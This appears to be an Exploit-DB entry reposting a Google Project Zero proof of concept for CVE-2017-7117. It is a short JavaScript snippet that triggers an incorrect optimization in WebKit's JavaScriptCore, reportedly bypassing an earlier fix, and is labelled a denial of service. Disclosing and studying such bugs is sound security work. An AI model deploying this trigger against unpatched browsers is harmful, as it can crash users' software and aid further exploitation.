WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)

EDB-ID: 42955
Author: Google Security Research
Published: 2017-10-04
CVE: CVE-2017-7117
Type: Dos
Platform: Multiple
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A

 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1319 

The following PoC bypasses the fix for the issue 1263 (https://bugs.chromium.org/p/project-zero/issues/detail?id=1263)

PoC:
-->

function f() {
let o = {};
for (let i in {xx: 0}) {
for (i of [0]) {

}

print(o[i]);
}
}

f();

Related Posts

Comments